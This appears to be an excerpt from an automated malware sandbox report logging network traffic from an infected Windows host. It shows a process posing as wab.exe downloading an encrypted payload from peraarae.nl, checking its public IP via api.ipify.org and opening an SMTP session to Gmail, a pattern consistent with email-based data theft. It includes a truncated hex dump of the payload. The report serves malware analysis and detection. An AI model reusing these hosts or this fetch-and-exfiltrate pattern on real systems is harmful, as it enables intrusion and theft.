                                            Aug 29, 2024 12:24:48.600984097 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.600985050 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.601073980 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.601142883 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.601171017 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.601207018 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.601243019 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.601346016 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.601387024 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.601387978 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.601433039 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.601512909 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.601555109 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.601555109 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.601587057 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.601663113 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.601721048 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.601735115 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.601814985 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.601872921 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.601896048 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.601959944 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.602029085 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.602061987 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.602061987 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.602116108 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.602185965 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.602229118 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.602257967 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.602332115 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.602406025 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.602406025 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.602406025 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.602428913 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.602519989 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.602576017 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.602600098 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.602679014 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.602740049 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.602746964 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.602747917 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.602747917 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.602833033 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.602900028 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.602910995 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.602986097 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.603049040 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.603080988 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.603080988 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.603132010 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.603200912 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.603260994 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.603260994 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.603271961 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.603352070 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.603419065 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.603420019 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.603420973 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.603523016 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.603598118 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.603599072 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.603617907 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.603696108 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.603758097 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.603765965 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.603765965 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.603846073 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.603905916 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.603936911 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.603938103 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.603991985 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.604064941 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.604104996 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.604105949 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.604125023 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:48.604274035 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.604274988 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:48.604438066 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:50.624665022 CEST49843443192.168.11.20104.26.12.205
                                            Aug 29, 2024 12:24:50.624685049 CEST44349843104.26.12.205192.168.11.20
                                            Aug 29, 2024 12:24:50.624917984 CEST49843443192.168.11.20104.26.12.205
                                            Aug 29, 2024 12:24:50.642031908 CEST49843443192.168.11.20104.26.12.205
                                            Aug 29, 2024 12:24:50.642044067 CEST44349843104.26.12.205192.168.11.20
                                            Aug 29, 2024 12:24:50.861922979 CEST44349843104.26.12.205192.168.11.20
                                            Aug 29, 2024 12:24:50.862096071 CEST49843443192.168.11.20104.26.12.205
                                            Aug 29, 2024 12:24:50.863775969 CEST49843443192.168.11.20104.26.12.205
                                            Aug 29, 2024 12:24:50.863787889 CEST44349843104.26.12.205192.168.11.20
                                            Aug 29, 2024 12:24:50.864065886 CEST44349843104.26.12.205192.168.11.20
                                            Aug 29, 2024 12:24:50.891908884 CEST49843443192.168.11.20104.26.12.205
                                            Aug 29, 2024 12:24:50.936178923 CEST44349843104.26.12.205192.168.11.20
                                            Aug 29, 2024 12:24:51.119833946 CEST44349843104.26.12.205192.168.11.20
                                            Aug 29, 2024 12:24:51.119951010 CEST44349843104.26.12.205192.168.11.20
                                            Aug 29, 2024 12:24:51.120335102 CEST49843443192.168.11.20104.26.12.205
                                            Aug 29, 2024 12:24:51.122718096 CEST49843443192.168.11.20104.26.12.205
                                            Aug 29, 2024 12:24:53.432931900 CEST8049842104.153.208.178192.168.11.20
                                            Aug 29, 2024 12:24:53.433056116 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:24:53.669774055 CEST49844587192.168.11.20172.253.62.108
                                            Aug 29, 2024 12:24:53.787556887 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:53.787753105 CEST49844587192.168.11.20172.253.62.108
                                            Aug 29, 2024 12:24:54.010840893 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:54.011126995 CEST49844587192.168.11.20172.253.62.108
                                            Aug 29, 2024 12:24:54.129091024 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:54.139844894 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:54.140108109 CEST49844587192.168.11.20172.253.62.108
                                            Aug 29, 2024 12:24:54.262428999 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:54.265098095 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:54.265499115 CEST49844587192.168.11.20172.253.62.108
                                            Aug 29, 2024 12:24:54.384344101 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:54.384358883 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:54.384411097 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:54.384434938 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:54.384511948 CEST49844587192.168.11.20172.253.62.108
                                            Aug 29, 2024 12:24:54.384560108 CEST49844587192.168.11.20172.253.62.108
                                            Aug 29, 2024 12:24:54.387073994 CEST49844587192.168.11.20172.253.62.108
                                            Aug 29, 2024 12:24:54.504956007 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:54.507900000 CEST49844587192.168.11.20172.253.62.108
                                            Aug 29, 2024 12:24:54.630431890 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:54.632827044 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:54.633426905 CEST49844587192.168.11.20172.253.62.108
                                            Aug 29, 2024 12:24:54.756501913 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:54.758424997 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:54.758727074 CEST49844587192.168.11.20172.253.62.108
                                            Aug 29, 2024 12:24:54.881484985 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:55.022644997 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:55.022937059 CEST49844587192.168.11.20172.253.62.108
                                            Aug 29, 2024 12:24:55.140899897 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:55.148011923 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:55.148313046 CEST49844587192.168.11.20172.253.62.108
                                            Aug 29, 2024 12:24:55.271450996 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:55.273760080 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:55.274027109 CEST49844587192.168.11.20172.253.62.108
                                            Aug 29, 2024 12:24:55.396413088 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:55.548815012 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:55.551326990 CEST49844587192.168.11.20172.253.62.108
                                            Aug 29, 2024 12:24:55.551326990 CEST49844587192.168.11.20172.253.62.108
                                            Aug 29, 2024 12:24:55.551326990 CEST49844587192.168.11.20172.253.62.108
                                            Aug 29, 2024 12:24:55.551373005 CEST49844587192.168.11.20172.253.62.108
                                            Aug 29, 2024 12:24:55.551623106 CEST49844587192.168.11.20172.253.62.108
                                            Aug 29, 2024 12:24:55.551697969 CEST49844587192.168.11.20172.253.62.108
                                            Aug 29, 2024 12:24:55.551731110 CEST49844587192.168.11.20172.253.62.108
                                            Aug 29, 2024 12:24:55.669449091 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:55.669480085 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:55.669502020 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:55.669584990 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:55.669603109 CEST49844587192.168.11.20172.253.62.108
                                            Aug 29, 2024 12:24:55.669743061 CEST49844587192.168.11.20172.253.62.108
                                            Aug 29, 2024 12:24:55.669853926 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:55.669883966 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:55.669905901 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:55.669981003 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:55.669989109 CEST49844587192.168.11.20172.253.62.108
                                            Aug 29, 2024 12:24:55.670008898 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:55.670094967 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:55.670118093 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:55.670162916 CEST49844587192.168.11.20172.253.62.108
                                            Aug 29, 2024 12:24:55.670162916 CEST49844587192.168.11.20172.253.62.108
                                            Aug 29, 2024 12:24:55.670254946 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:55.670327902 CEST49844587192.168.11.20172.253.62.108
                                            Aug 29, 2024 12:24:55.670430899 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:55.670523882 CEST49844587192.168.11.20172.253.62.108
                                            Aug 29, 2024 12:24:55.787441969 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:55.787555933 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:55.787781954 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:55.787900925 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:55.788031101 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:55.788120031 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:55.788129091 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:55.788304090 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:55.788314104 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:55.788382053 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:56.416882038 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:24:56.463006020 CEST49844587192.168.11.20172.253.62.108
                                            Aug 29, 2024 12:26:33.582690954 CEST49844587192.168.11.20172.253.62.108
                                            Aug 29, 2024 12:26:33.700808048 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:26:33.707943916 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:26:33.708008051 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:26:33.708372116 CEST49844587192.168.11.20172.253.62.108
                                            Aug 29, 2024 12:26:33.708615065 CEST49844587192.168.11.20172.253.62.108
                                            Aug 29, 2024 12:26:33.826770067 CEST58749844172.253.62.108192.168.11.20
                                            Aug 29, 2024 12:26:37.472119093 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:26:37.878056049 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:26:38.690464973 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:26:40.299432039 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:26:43.517491102 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:26:49.953571081 CEST4984280192.168.11.20104.153.208.178
                                            Aug 29, 2024 12:27:02.825788021 CEST4984280192.168.11.20104.153.208.178
                                            TimestampSource PortDest PortSource IPDest IP
                                            Aug 29, 2024 12:24:47.488473892 CEST6409053192.168.11.201.1.1.1
                                            Aug 29, 2024 12:24:47.596889019 CEST53640901.1.1.1192.168.11.20
                                            Aug 29, 2024 12:24:50.517416000 CEST6093953192.168.11.201.1.1.1
                                            Aug 29, 2024 12:24:50.621104002 CEST53609391.1.1.1192.168.11.20
                                            Aug 29, 2024 12:24:53.565211058 CEST6008353192.168.11.201.1.1.1
                                            Aug 29, 2024 12:24:53.669096947 CEST53600831.1.1.1192.168.11.20
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Aug 29, 2024 12:24:47.488473892 CEST192.168.11.201.1.1.10xec95Standard query (0)peraarae.nlA (IP address)IN (0x0001)false
                                            Aug 29, 2024 12:24:50.517416000 CEST192.168.11.201.1.1.10x609aStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                            Aug 29, 2024 12:24:53.565211058 CEST192.168.11.201.1.1.10x3d0fStandard query (0)smtp.gmail.comA (IP address)IN (0x0001)false
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Aug 29, 2024 12:24:47.596889019 CEST1.1.1.1192.168.11.200xec95No error (0)peraarae.nl104.153.208.178A (IP address)IN (0x0001)false
                                            Aug 29, 2024 12:24:50.621104002 CEST1.1.1.1192.168.11.200x609aNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                            Aug 29, 2024 12:24:50.621104002 CEST1.1.1.1192.168.11.200x609aNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                            Aug 29, 2024 12:24:50.621104002 CEST1.1.1.1192.168.11.200x609aNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                            Aug 29, 2024 12:24:53.669096947 CEST1.1.1.1192.168.11.200x3d0fNo error (0)smtp.gmail.com172.253.62.108A (IP address)IN (0x0001)false
                                            • api.ipify.org
                                            • peraarae.nl
                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.11.2049842104.153.208.178802640C:\Program Files (x86)\Windows Mail\wab.exe
                                            TimestampBytes transferredDirectionData
                                            Aug 29, 2024 12:24:47.767525911 CEST172OUTGET /ViaMYxizkt11.bin HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                            Host: peraarae.nl
                                            Cache-Control: no-cache
                                            Aug 29, 2024 12:24:47.935977936 CEST1289INHTTP/1.1 200 OK
                                            Date: Thu, 29 Aug 2024 10:24:47 GMT
                                            Server: Apache
                                            Last-Modified: Thu, 29 Aug 2024 02:31:12 GMT
                                            Accept-Ranges: bytes
                                            Content-Length: 249920
                                            Content-Type: application/octet-stream
                                            Data Raw: 42 2d 1d c3 68 38 c3 6f 99 8c be 56 69 9d dd 92 96 80 ae f3 dd 86 43 57 36 4f f7 18 f1 fa 96 77 3c 02 8a 67 d4 0f ac e7 b3 e3 cc c4 b1 01 31 a7 6d 05 d2 84 4e ca 7f a2 36 c0 5f 0d 28 37 b8 76 6e 80 4b d4 34 6f ae 14 32 0e 29 33 15 16 a2 58 01 13 4d 23 40 88 f7 31 38 77 b5 d4 00 3b 80 31 b3 13 3e 7d 10 c3 26 41 7f 48 53 7d 70 43 0b 11 f6 f2 8f de e3 8b 00 3d 0e 45 81 17 af 6f f9 96 04 01 12 d2 2b cb e4 5a 15 96 0c db 29 c3 86 98 0c 5a 1b 73 9c 24 13 92 79 bf 03 4d a0 cc 86 b7 d3 fe 40 c8 49 2b 3a a2 0d 49 dd c4 42 d6 1b d0 1d b7 4b 08 ab b5 c7 2c 34 7c f8 16 8b b2 ce f2 e6 9e 20 b2 43 c0 bc fc 86 31 99 ae fb 2f ac 19 c0 cd 53 ee 58 9b 94 5f ab 46 95 e8 fb e8 9a a8 52 ae e0 38 9a d6 cd 3c 30 f8 63 5f 4e f6 2e 78 c3 40 c9 92 b9 bc 79 f3 c7 c8 43 51 99 ef 19 16 f8 f6 f6 f6 0a fe c5 70 08 44 ed bb ab 28 78 1c be f1 b3 a6 81 80 21 8e 20 97 ac b2 ba 40 90 01 73 7f ca d6 5f 8d 9b 51 e0 bd b7 42 86 d5 b8 1d a7 3d fb e8 88 2f 54 d2 fd ad c8 55 3b b2 34 80 5b 27 0d 3c 83 d6 d9 0e 65 80 40 ea 99 38 47 63 02 d6 [TRUNCATED]
                                            Data Ascii: B-h8oViCW6Ow<g1mN6_(7vnK4o2)3XM#@18w;1>}&AHS}pC=Eo+Z)Zs$yM@I+:IBK,4| C1/SX_FR8<0c_N.x@yCQpD(x! @s_QB=/TU;4['<e@8Gc#<|Rf,zc:>%!q&23P\'RZcJ|(QzT^a'4V:L9P/:cP|y=`Qi-Z+TCq-LUuW4&&ufO\),i?xQTrtid._zY_52sB/36j.!713C5Hnt[+t-JjJVOD{YPLv-g8U*r}A_gq-Mr|jBtKiLe2S?j?E}~ [,>^rER6u9bmd~y4+MwMOUGLKec3Mk.-[sUMMT9mg4&/y]?]c7s92A4;_6~Dv*-Kl1;(xnYr3jO~YmeA'!8Cy#08UxE>k5Pb,an?"Y|[/SqGz [TRUNCATED]
                                            Aug 29, 2024 12:24:47.936077118 CEST1289INData Raw: 1b 85 9e 3a fd cf c8 9a 84 89 6a b5 b7 11 8a 63 86 a6 e8 33 11 24 d4 5e 59 dc cf 9c 7b 8f 3e 10 21 fd 00 ff 8e 09 a9 2a e2 05 ba 58 b0 8d 5c c7 59 11 e2 bd 1f 2f cd f6 8b da f8 93 ba 46 bf 75 b4 35 59 5b 59 eb d3 20 18 6f 0b de b7 0e 15 b6 d4 ca
                                            Data Ascii: :jc3$^Y{>!*X\Y/Fu5Y[Y oZ6`e%7k4uR3z0X@2_11>"='WIy7X!_+D.Eh4qi,Ok$ot|8?&<'O)6p'&ve PQ-b#
                                            Aug 29, 2024 12:24:47.936101913 CEST1289INData Raw: 61 03 19 01 ed 36 eb e0 18 d6 09 64 c3 8a fb d8 a7 d4 20 df 6a 71 4f bc 05 dd b3 e4 00 b3 56 f2 0b 78 2f 6d 81 92 e8 24 13 01 58 16 8b b6 e4 b8 b4 f3 33 b2 0f cb bd 8e 79 6b ff b8 d3 2e ad 19 c6 e7 4d ec c3 3a 96 5e a4 6d bc ea f8 53 38 a8 52 a2
                                            Data Ascii: a6d jqOVx/m$X3yk.M:^mS8Rr<Nb-.F'JCQ;T:l"zn &wU\8Q7~TU=*g<f9m)0<N-|i8%!r[\2R
                                            Aug 29, 2024 12:24:47.936148882 CEST1289INData Raw: 36 fb 9e c3 0e 38 fe f4 db 0d 18 61 44 ea db 17 59 61 79 34 23 e5 38 f6 e6 94 7f 2f 14 a4 66 c6 06 1f 78 38 4f 3a d9 3a 0f 03 b8 e6 f0 7b 71 26 fd 18 d8 b6 cc 37 b1 33 b8 25 9b de a7 d6 72 50 0c cd 9a e4 17 cc b0 27 52 5e 49 68 8d 7f 7a 7a 09 ae
                                            Data Ascii: 68aDYay4#8/fx8O::{q&73%rP'R^Ihzz@(sqgTTtWI/V07?ze<.~Gd3}aRi)X%)RMs/LSxW2$UuLm&g\srcvsCgn>
                                            Aug 29, 2024 12:24:47.936338902 CEST1289INData Raw: 9e 14 da b0 ce ac 89 67 57 1b 0f 20 d0 75 87 57 ca 28 87 26 b8 5c 1d 75 e4 46 4d 1c 84 5b b7 66 b3 04 86 ab ef e8 31 be d9 5e e9 52 92 0b e7 aa 7c 63 9f 86 45 78 9c 8a b7 f9 f7 69 c0 4a 65 2a d4 17 8d a9 cd 17 bd aa 2a 30 31 d8 8a d8 29 5e 5f 0e
                                            Data Ascii: gW uW(&\uFM[f1^R|cExiJe**01)^_m>q6k)N71C9HNt[t-jjJO{YPM<s0 LA7YXbGa196`t{1ZRFHV,
                                            Aug 29, 2024 12:24:47.936363935 CEST1289INData Raw: 4f f5 23 b4 a9 86 24 90 21 a6 80 59 66 b1 55 c9 61 9d c3 a8 92 31 96 2b c7 fc 39 3a b8 76 12 f4 94 13 44 94 ad 40 c8 4d 6b 1a 7b 30 4b 9d 11 52 bb c9 c9 47 92 ae d0 53 e5 4e a8 d7 26 ea 07 eb 9a e3 98 2f 8f d4 e1 49 bd d7 0b d5 8e a9 13 11 c0 65
                                            Data Ascii: O#$!YfUa1+9:vD@Mk{0KRGSN&/Ie!u;t%"*b3/b?r{[(2$G=a>&hnyO8&Zrl_MTgl:&H{]?21vA2)A46/~+S O-KlOV8!
                                            Aug 29, 2024 12:24:47.936438084 CEST1289INData Raw: 29 46 55 4d f0 b3 5a 38 c4 4d c9 f8 06 34 0a 28 6b 79 5d c1 3e 60 9b 17 7e fc f3 73 b9 33 30 88 9b 41 34 c5 15 84 ec 16 a5 19 d1 aa ac 7d 45 ff 23 72 0a b8 8e 96 2d 29 88 8e 4b 6c b1 b0 d2 a6 6f a5 34 27 1e c8 0a b0 af aa f1 08 16 fd 1f 12 da 93
                                            Data Ascii: )FUMZ8M4(ky]>`~s30A4}E#r-)Klo4'c=,hx=?kW3\[G>Vrp3V1gz#O=&=q(qw[-0.ZWePS92F&q2l*JeNfnYV_J7
                                            Aug 29, 2024 12:24:47.936533928 CEST1289INData Raw: 47 d2 a9 d1 30 bb c3 d0 56 1c 66 76 25 f9 65 c4 22 60 30 d3 60 62 af 25 9d 46 26 4e ad 17 71 e1 05 30 6c ea 0a bb 8a 66 f6 48 bb e0 fc ca e8 04 7b 83 97 12 66 31 ab 0d cc b8 ef f2 ef 4e 3b a5 5e 4a 28 9b b0 38 08 4b a5 10 46 91 b7 c8 64 88 8a 6a
                                            Data Ascii: G0Vfv%e"`0`b%F&Nq0lfH{f1N;^J(8KFdjg~.$Wp~8\EFE^ 'Y\~O&M6j/<o.MI1Xw3]&AFP}p<7X/>+4.
                                            Aug 29, 2024 12:24:47.936645985 CEST1289INData Raw: 6a 2a 33 9a c1 e0 58 b9 19 cd 3b 40 88 f3 43 05 75 b5 a4 28 7a 80 31 b9 93 27 7d 10 c7 54 29 7c 48 23 55 32 43 0b 1b 76 e8 8f de e7 f9 52 3e 0e 35 a9 56 2f 6f f3 16 11 1e a8 d8 59 0f ee 97 44 ae 11 97 e4 e6 a0 7e 66 29 4b 83 f3 4b 74 e4 6a 6c 20
                                            Data Ascii: j*3X;@Cu(z1'}T)|H#U2CvR>5V/oYD~f)KKtjl ."P#jY?L2 tKnmJ|d AxF/S^*NQ8<c_>VxDIsCUvpW;~! R@vQB;$=QU
                                            Aug 29, 2024 12:24:47.936712027 CEST1289INData Raw: f9 39 e6 47 51 b9 e8 19 16 fc 08 f8 fa 0a fe 3b 7c 00 44 cd b1 ab 28 78 e2 bf 88 b9 a6 81 82 19 23 21 97 ac 92 b3 40 d0 84 8d 71 d6 d6 5f 63 97 5d e0 9d bc 42 86 c5 46 1c 9e 1a fb e8 98 d1 59 d4 fd d6 8b 55 3b b6 14 81 7f c3 0e 65 f4 d7 d9 0e 65
                                            Data Ascii: 9GQ;|D(x#!@q_c]BFYU;ee=F# \f< zc:> q69BP7+^ZCD|hh,QxTa/srV:@H/n"|h;y<_)i4Z'zHU
                                            Aug 29, 2024 12:24:48.100565910 CEST1289INData Raw: 64 c8 87 2f 79 99 b4 6a e0 56 3a e1 40 1d 09 c7 5c 2e 87 54 41 05 e4 db 5c ac c7 46 64 63 8e 10 33 ea 87 31 74 63 e3 ab d8 b1 ea 09 05 e0 4e fb 69 bb 5e 21 9c d2 a4 2c 0d 2b ef 21 b6 e0 a9 8e b9 43 9c c2 56 7f 7d 9f 0d d0 b0 ce ac 5f 42 56 1b 09
                                            Data Ascii: d/yjV:@\.TA\Fdc31tcNi^!,+!CV}_BVvw5&&F(cfO[I?ZQWrcatnQy Z_.mp7qB}jfk".1C;HVu[+t/JsGH{3ySL>xL


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.11.2049843104.26.12.2054432640C:\Program Files (x86)\Windows Mail\wab.exe
                                            TimestampBytes transferredDirectionData
                                            2024-08-29 10:24:50 UTC155OUTGET / HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                            Host: api.ipify.org
                                            Connection: Keep-Alive
                                            2024-08-29 10:24:51 UTC211INHTTP/1.1 200 OK
                                            Date: Thu, 29 Aug 2024 10:24:51 GMT
                                            Content-Type: text/plain
                                            Content-Length: 13
                                            Connection: close
                                            Vary: Origin
                                            CF-Cache-Status: DYNAMIC
                                            Server: cloudflare
                                            CF-RAY: 8babd56f0cfbc55f-IAD
                                            2024-08-29 10:24:51 UTC13INData Raw: 31 30 32 2e 31 36 35 2e 34 38 2e 37 34
                                            Data Ascii: 102.165.48.74


                                            TimestampSource PortDest PortSource IPDest IPCommands
                                            Aug 29, 2024 12:24:54.010840893 CEST58749844172.253.62.108192.168.11.20220 smtp.gmail.com ESMTP d75a77b69052e-45682c8277csm3734901cf.3 - gsmtp
                                            Aug 29, 2024 12:24:54.011126995 CEST49844587192.168.11.20172.253.62.108EHLO 724536
                                            Aug 29, 2024 12:24:54.139844894 CEST58749844172.253.62.108192.168.11.20250-smtp.gmail.com at your service, [102.165.48.74]
                                            250-SIZE 35882577
                                            250-8BITMIME
                                            250-STARTTLS
                                            250-ENHANCEDSTATUSCODES
                                            250-PIPELINING
                                            250-CHUNKING
                                            250 SMTPUTF8
